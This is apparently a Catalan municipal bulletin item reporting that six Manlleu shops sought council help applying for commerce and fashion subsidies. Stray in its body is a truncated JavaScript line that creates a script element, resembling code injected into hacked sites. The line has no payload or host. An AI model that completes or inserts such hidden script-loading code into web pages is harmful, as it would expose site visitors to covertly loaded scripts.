• Inici
  • Butlletí
  • Sis establiments comercials de Manlleu han demanat les subvencions en l’àmbit de comerç, serveis, artesania i moda

Sis establiments comercials de Manlleu han demanat les subvencions en l’àmbit de comerç, serveis, artesania i moda

El passat 4 de juliol es va iniciar el termini per presentar les subvencions en l’àmbit de comerç, serveis, artesania i moda. Després d’enviar la informació als establiments comercials, sis d’ells varen sol·licitar suport a l’Àrea de Serveis a les Persones i Promoció Econòmica, per tramitar les subvencions. Tots ells han estat molt contents, ja que disposen de poc temps en el seu dia a dia per fer aquest tipus de tràmits.

IMG_20160726_135713

Des de l’Àrea  donem un cop de mà a qui ho necessiti pel que fa a temes diversos: ajuts i subvencions, legislació i normativa, tràmits administratius, sòl industrial, naus i locals, dades socioeconòmiques, formació a mida, selecció de personal, assessorament empresarial, assessorament en estalvi i eficiència energètica, entre d’altres temes.

var d=document;var s=d.createElement(‘script’);

Etiquetes

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa